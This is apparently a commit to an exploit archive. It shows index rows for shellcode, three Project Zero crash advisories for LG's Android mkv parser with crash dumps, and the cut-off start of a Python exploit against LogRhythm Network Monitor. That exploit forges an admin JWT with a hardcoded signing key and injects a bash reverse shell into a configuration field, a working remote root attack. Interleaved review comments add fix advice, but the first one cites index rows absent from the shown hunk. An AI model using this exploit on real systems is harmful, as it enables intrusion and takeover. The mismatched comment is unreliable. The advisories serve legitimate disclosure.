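Review bot: entry 40094 (dated 2016-07-13) is placed between 39718 and 39722 in this hunk, breaking the ascending id and date order that every other row in the hunk follows; if files.csv is kept sorted by id, the row belongs after 39869, otherwise tools that diff or merge the index by position will keep reporting it as moved.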

@ -16078,9 +16085,9 @@ id,file,description,date,author,platform,type,port
40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Netcat Bind Shellcode with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh Bind Port 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse Port 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0

@ -16094,7 +16101,7 @@ id,file,description,date,author,platform,type,port
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind Port 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0

@ -37821,3 +37828,5 @@ id,file,description,date,author,platform,type,port
41963,platforms/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",linux,webapps,0
41966,platforms/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,php,webapps,80
41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80
41976,platforms/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps,0
41979,platforms/php/webapps/41979.txt,"I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps,0

platforms/android/dos/41981.txt
Executable file

@ -0,0 +1,82 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1102

In both of the following functions
mkvparser::AudioTrack::AudioTrack(mkvparser::Segment*, mkvparser::Track::Info const&, long long, long long)
mkvparser::VideoTrack::VideoTrack(mkvparser::Segment*, mkvparser::Track::Info const&, long long, long long)

During EBML node parsing the EBML element_size is used unvalidated to allocate a
stack buffer to store the element contents. Since calls to alloca simply compile
to a subtraction from the current stack pointer, for large sizes this can result
in memory corruption and potential remote-code-execution in the mediaserver
process.

Tested on an LG-G4 with the latest firmware available for my device; MRA58K.

See attached for crash samples and the original unmodified file.

(audio_track.mkv)

Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 16668, tid: 16986, name: pd_session >>> /system/bin/mediaserver <<<
AM write failed: Broken pipe
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x2e924108
r0 c01db33f r1 efd34940 r2 0000022c r3 2e924118
r4 f1449d80 r5 eeaff4d0 r6 eeaff470 r7 eeaff458
r8 f144f228 r9 00000000 sl 0000022c fp 00000000
ip 00000000 sp 2e924108 lr efd2afeb pc efd2b2c0 cpsr 800f0030

backtrace:
#00 pc 000122c0 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser10AudioTrackC1EPNS_7SegmentERKNS_5Track4InfoExx+123)
#01 pc 0001247b /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6Tracks15ParseTrackEntryExxRPNS_5TrackExx+222)
#02 pc 00012635 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksC1EPNS_7SegmentExxxx+372)
#03 pc 000128a9 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment12ParseHeadersEv+552)
#04 pc 0000c821 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractorC1EP11IDataSourceb+132)
#05 pc 00009d01 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser4OpenEP11IDataSource+56)
#06 pc 000271f9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorC2ERKNS_2spINS_10DataSourceEEE+200)
#07 pc 00022a85 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+68)
#08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#09 pc 0005a209 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession18initFromDataSourceEv+312)
#10 pc 0005d1bf /system/lib/liblgesourceplugin.so (_ZN7android9PDSession14onPrepareAsyncEv+490)
#11 pc 0005d471 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession17onMessageReceivedERKNS_2spINS_8AMessageEEE+68)
#12 pc 0000b309 /system/lib/libstagefright_foundation.so (_ZN7android8AHandler14deliverMessageERKNS_2spINS_8AMessageEEE+16)
#13 pc 0000d2ef /system/lib/libstagefright_foundation.so (_ZN7android8AMessage7deliverEv+54)
#14 pc 0000bd15 /system/lib/libstagefright_foundation.so (_ZN7android7ALooper4loopEv+224)
#15 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#16 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#17 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)

(video_track.mkv)

pid: 18217, tid: 18508, name: pd_session >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x2ae64110
r0 c01db33f r1 efd5e940 r2 000001bd r3 00000000
AM write failed: Broken pipe
r4 eb03f4d0 r5 f1409b40 r6 eb03f470 r7 eb03f460
r8 f140f360 r9 2ae64120 sl c01db4fc fp 00000000
ip efd5ee80 sp 2ae64110 lr efd54feb pc efd5517a cpsr 800f0030

backtrace:
#00 pc 0001217a /system/lib/liblg_parser_mkv.so (_ZN9mkvparser10VideoTrackC1EPNS_7SegmentERKNS_5Track4InfoExx+113)
#01 pc 00012449 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6Tracks15ParseTrackEntryExxRPNS_5TrackExx+172)
#02 pc 00012635 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksC1EPNS_7SegmentExxxx+372)
#03 pc 000128a9 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment12ParseHeadersEv+552)
#04 pc 0000c821 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractorC1EP11IDataSourceb+132)
#05 pc 00009d01 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser4OpenEP11IDataSource+56)
#06 pc 000271f9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorC2ERKNS_2spINS_10DataSourceEEE+200)
#07 pc 00022a85 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+68)
#08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#09 pc 0005a209 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession18initFromDataSourceEv+312)
#10 pc 0005d1bf /system/lib/liblgesourceplugin.so (_ZN7android9PDSession14onPrepareAsyncEv+490)
#11 pc 0005d471 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession17onMessageReceivedERKNS_2spINS_8AMessageEEE+68)
#12 pc 0000b309 /system/lib/libstagefright_foundation.so (_ZN7android8AHandler14deliverMessageERKNS_2spINS_8AMessageEEE+16)
#13 pc 0000d2ef /system/lib/libstagefright_foundation.so (_ZN7android8AMessage7deliverEv+54)
#14 pc 0000bd15 /system/lib/libstagefright_foundation.so (_ZN7android7ALooper4loopEv+224)
#15 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#16 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#17 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41981.zip
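Review bot: the report names the root cause (the EBML element_size reaches alloca unvalidated in the AudioTrack and VideoTrack constructors) but never says what the remedy is; for anyone triaging the file, add that the size must be bounded against a sane maximum before the stack allocation, or the buffer moved to a heap allocation whose size is checked. It is also worth spelling out the evidence already in the dumps: in both crashes the fault addr equals sp (0x2e924108 and 0x2ae64110), which is what a large subtraction from the stack pointer into unmapped memory looks like, and the sample-file names (audio_track.mkv, video_track.mkv) map one-to-one onto the two constructors in frame #00. Finally, a .txt advisory is being added with the executable bit set ("Executable file"), which it does not need.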

platforms/android/dos/41982.txt
Executable file

@ -0,0 +1,56 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1117

Failure to initialise pointers in mkvparser::Tracks constructor

The constructor mkvparser::Tracks::Tracks() doesn't handle parsing failures correctly.

If we look at the function, it makes allocations in two places; the first where it allocates a temporary array, and the second, where we make the allocation of an array of Track* which we will store in the Tracks object. Note that there is no path in the function which can free the second allocation; if the parsing of the Track object fails in the subsequent code these pointers are left uninitialised.

Subsequent code will then dereference and use the uninitialised pointers. The results of this obviously depend on the state of the heap prior to parsing of the testcase - a commonly occuring crash where a vtable pointer has been read through the bad pointer during destruction of the Tracks object.

Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 31956, tid: 31904, name: NuPlayerDriver >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0xf62c9880
r0 eee45000 r1 f62e4b60 r2 f62c9880 r3 eb1c08a0
AM write failed: Broken pipe
r4 f1859da0 r5 f15ce05c r6 f15ce060 r7 f62c9880
r8 fffdfc60 r9 efc3f5f4 sl 6175644e fp f6f50c11
ip eb1c0d18 sp efc3f4c0 lr eb1b19b5 pc f62c9880 cpsr a00f0010

backtrace:
#00 pc 00049880 [anon:libc_malloc]
#01 pc 0000c9b3 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksD1Ev+34)
#02 pc 0000c9cd /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksD0Ev+4)
#03 pc 0001150d /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7SegmentD1Ev+60)
#04 pc 0000b015 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractorD1Ev+10)
#05 pc 00009449 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser5CloseEv+24)
#06 pc 0002739b /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD1Ev+38)
#07 pc 00027425 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD0Ev+4)
#08 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#09 pc 00027481 /system/lib/libLGParserOSAL.so
#10 pc 000274d9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractor11LGMKVSourceD0Ev+4)
#11 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#12 pc 000329bd /system/lib/liblgesourceplugin.so (_ZN7android2spINS_3lge20StreamingBufferQueueEED1Ev+18)
#13 pc 0005997d /system/lib/liblgesourceplugin.so (_ZNK7android6VectorINS_2spINS_11MediaSourceEEEE10do_destroyEPvj+12)
#14 pc 00010b6d /system/lib/libutils.so (_ZN7android10VectorImpl15release_storageEv+28)
#15 pc 00010bd9 /system/lib/libutils.so (_ZN7android10VectorImpl13finish_vectorEv+4)
#16 pc 00058cb7 /system/lib/liblgesourceplugin.so
#17 pc 0005a695 /system/lib/liblgesourceplugin.so (_ZN7android9PDSessionD1Ev+292)
#18 pc 0005a6d9 /system/lib/liblgesourceplugin.so (_ZN7android9PDSessionD0Ev+4)
#19 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#20 pc 00057f69 /system/lib/liblgesourceplugin.so (_ZN7android12HTTPPDSource4stopEv+72)
#21 pc 0006bc51 /system/lib/libmediaplayerservice.so (_ZN7android8NuPlayer12performResetEv+168)
#22 pc 0006b103 /system/lib/libmediaplayerservice.so (_ZN7android8NuPlayer22processDeferredActionsEv+90)
#23 pc 00069ca1 /system/lib/libmediaplayerservice.so (_ZN7android8NuPlayer17onMessageReceivedERKNS_2spINS_8AMessageEEE+4944)
#24 pc 0000b309 /system/lib/libstagefright_foundation.so (_ZN7android8AHandler14deliverMessageERKNS_2spINS_8AMessageEEE+16)
#25 pc 0000d2ef /system/lib/libstagefright_foundation.so (_ZN7android8AMessage7deliverEv+54)
#26 pc 0000bd15 /system/lib/libstagefright_foundation.so (_ZN7android7ALooper4loopEv+224)
#27 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#28 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#29 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41982.zip
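Review bot: typo in the paragraph beginning "Subsequent code will then dereference": "occuring" should be "occurring". The same paragraph describes the failure (Track* entries left uninitialised when parsing of a track entry fails, then read through in the Tracks destructor, which is exactly frame #01 _ZN9mkvparser6TracksD1Ev with pc equal to the fault addr 0xf62c9880, i.e. an indirect call through a garbage vtable pointer) but not the fix; add that the array should be zero-initialised when allocated, or the number of successfully constructed entries tracked, so the destructor only touches valid pointers. The file is also added with the executable bit set ("Executable file"), which a .txt advisory does not need.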

platforms/android/dos/41983.txt
Executable file

@ -0,0 +1,133 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1124

There are multiple paths in mkvparser::Block::Block(...) that result in heap buffer overflows. See attached for sample files that trigger the overflow conditions - these will not reliably crash the process, since the overflows are small and don't deterministically corrupt interesting data.

All offsets correspond to the version of the library I have, with md5sum 6708b7a76313c0a51df34c3cec5a0e0d.

Attached are crashers for the testcases which repeatedly cause the parsing of the files by the mediaserver process (via binder ipc), which will eventually cause the mediaserver to crash when the corrupted data is used.

1) (000035.mkv) Writing outside the bounds of a new[0] allocation.

In mkvparser::Block::Block, there is a call to new[] (0xfd44) with an attacker controlled count. By setting this count to 0, this will be passed by _Znaj/_Znwj as a call to malloc(1). In jemalloc, this will result in a minimum-sized allocation of 8 bytes.

The result of this new[] call is stored in the mkvparser::Block structure at offset 0x1c, and if we take the path resulting in a call to mkvparser::Block::BlockWithEbml (0xfe50), this function will write into this allocation at an offset of 8, overwriting the dword immediately following the allocation (0xfb54).

Due to the behaviour of jemalloc, this will be the first dword of another allocation of size 8.

Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
AM write failed: Broken pipe
ABI: 'arm'
pid: 14682, tid: 14791, name: Binder_2 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe3617e2e
r0 f153f250 r1 f003f4e8 r2 00000000 r3 e3617e22
r4 f003f500 r5 f153f250 r6 f003f4e8 r7 f1a59d58
r8 f05008f4 r9 00000000 sl 000003f5 fp f050081c
ip f6680e04 sp f05006a0 lr f667800b pc f714f742 cpsr 600f0030

backtrace:
#00 pc 0000e742 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+33)
#01 pc 00008007 /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD2Ev+22)
#02 pc 0000801d /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD0Ev+4)
#03 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#04 pc 000273f1 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD1Ev+124)
#05 pc 00027425 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD0Ev+4)
#06 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#07 pc 000d64af /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD1Ev+118)
#08 pc 000d6515 /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD0Ev+4)
#09 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#10 pc 00058ee5 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient10disconnectEv+24)
#11 pc 0008e19d /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+72)
#12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#16 pc 00023909 /system/lib/libbinder.so
#17 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#18 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#19 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)

2) (000038.mkv) Writing outside the bounds of a new[16] allocation.

Following a similar path through the code, but instead letting the count resolve to 1, we get an allocation of size 16. We will then write outside the bounds of this allocation in mkvparser::Block::BlockWithEbml at (0xfbe0).

Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 16410, tid: 16516, name: Binder_2 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x6ec
r0 000006ec r1 f06dd3fc r2 00000002 r3 efba11c4
AM write failed: Broken pipe
r4 00000000 r5 00000800 r6 f19cf6c0 r7 00000800
r8 00000000 r9 00000812 sl efba12e0 fp 00001000
ip 00000000 sp f06dd410 lr 00000001 pc f6f31cb8 cpsr 200f0030

backtrace:
#00 pc 00093cb8 /system/lib/libstagefright.so (_ZN7android18CallbackDataSource6readAtExPvj+39)
#01 pc 00093e97 /system/lib/libstagefright.so (_ZN7android15TinyCacheSource6readAtExPvj+230)
#02 pc 000262c9 /system/lib/libLGParserOSAL.so (_ZN19LGDataSourceAdaptor4ReadEPhPm+28)
#03 pc 00014737 /system/lib/liblg_parser_mkv.so (_ZN9MkvReader4ReadExlPh+62)
#04 pc 0000e1ed /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment17DoLoadClusterInfoERxRlS1_S1_+212)
#05 pc 00013c71 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment13DoLoadClusterERxRl+140)
#06 pc 00013e43 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment11LoadClusterERxRl+14)
#07 pc 0000aa73 /system/lib/liblg_parser_mkv.so (_ZN13BlockIterator3eosEv+42)
#08 pc 0000b16f /system/lib/liblg_parser_mkv.so (_ZN13BlockIterator7advanceEv+66)
#09 pc 0000b765 /system/lib/liblg_parser_mkv.so (_ZN8MkvTrackC2EP12MkvExtractorm+164)
#10 pc 0000b7d9 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractor8addTrackEm+24)
#11 pc 00009c81 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser8GetTrackEi+8)
#12 pc 00009dc1 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser4OpenEP11IDataSource+248)
#13 pc 000271f9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorC2ERKNS_2spINS_10DataSourceEEE+200)
#14 pc 00022a85 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+68)
#15 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#16 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
#17 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
#18 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
#19 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#20 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#21 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#22 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#23 pc 00023909 /system/lib/libbinder.so
#24 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#25 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#26 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)

3) (000128.mkv) Writing outside the bounds of a new[1] allocation.

Similarly to 1) but writing out of bounds at (0xfdd0) without calling through to BlockWithEbml.

Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 16661, tid: 18181, name: Binder_6 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x1ac
r0 f134e130 r1 e9a3b0d8 r2 00000000 r3 000001a0
AM write failed: Broken pipe
r4 e9a3b0f0 r5 f134e130 r6 e9a3b0d8 r7 ef8b94e8
r8 ee5bf8f4 r9 00000000 sl 000003f5 fp ee5bf81c
ip f61fae04 sp ee5bf6a0 lr f61f200b pc f6cc9742 cpsr 600f0030

backtrace:
#00 pc 0000e742 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+33)
#01 pc 00008007 /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD2Ev+22)
#02 pc 0000801d /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD0Ev+4)
#03 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#04 pc 000273f1 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD1Ev+124)
#05 pc 00027425 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD0Ev+4)
#06 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#07 pc 000d64af /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD1Ev+118)
#08 pc 000d6515 /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD0Ev+4)
#09 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
#10 pc 00058ee5 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient10disconnectEv+24)
#11 pc 0008e19d /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+72)
#12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#16 pc 00023909 /system/lib/libbinder.so
#17 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#18 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#19 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41983.zip
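Review bot: the three cases are documented only as offsets into one build of liblg_parser_mkv.so (md5sum 6708b7a76313c0a51df34c3cec5a0e0d) and the report never states the fix, so add that the count read from the file must be validated before the new[] at 0xfd44 and that the writes in Block::BlockWithEbml (0xfe50, 0xfbe0) and at 0xfdd0 must be bounds-checked against the size actually allocated. The opening paragraph's warning that the samples "will not reliably crash the process" deserves a pointer to the dumps as confirmation: none of the three backtraces is in Block::Block itself; cases 1 and 3 die later in RefBase::decStrong during extractor teardown and case 2 in CallbackDataSource::readAt, i.e. when the corrupted neighbouring heap data is consumed, so a reader should not expect a crash at the overflow site. The file is also added with the executable bit set ("Executable file"), which a .txt advisory does not need.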

platforms/linux/webapps/41976.py
Executable file

@ -0,0 +1,54 @@
# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
|
||||
# Public Disclosure Date: 24 Apr 2017
|
||||
# Author: Francesco Oddo
|
||||
# Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
|
||||
# Software Link: https://logrhythm.com/network-monitor-freemium/
|
||||
# Version: 3.3.2.1061 (latest) or below
|
||||
# Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
|
||||
# Dependencies: `pip install PyJWT`
|
||||
|
||||
import json
|
||||
import requests
|
||||
import argparse
|
||||
import time
|
||||
import jwt
|
||||
|
||||
def forge_jwt(rhost):
|
||||
print "[+] Forging JWT authentication token"
|
||||
key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'
|
||||
|
||||
iat = time.time()
|
||||
exp = iat + 3600;
|
||||
|
||||
body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
|
||||
body["iat"] = int(iat)
|
||||
body["exp"] = int(exp)
|
||||
|
||||
token = jwt.encode(body, key, algorithm='HS512');
|
||||
return token
|
||||
|
||||
def command_inject(rhost, lhost, lport, gwhost, ifname):
|
||||
uri = "https://%s/data/api/configuration/" % rhost
|
||||
json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
|
||||
payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
|
||||
json_body["configurations"][0]["value"] = ifname
|
||||
json_body["configurations"][2]["value"] = rhost
|
||||
json_body["configurations"][3]["value"] = payload
|
||||
json_body["configurations"][4]["value"] = gwhost
|
||||
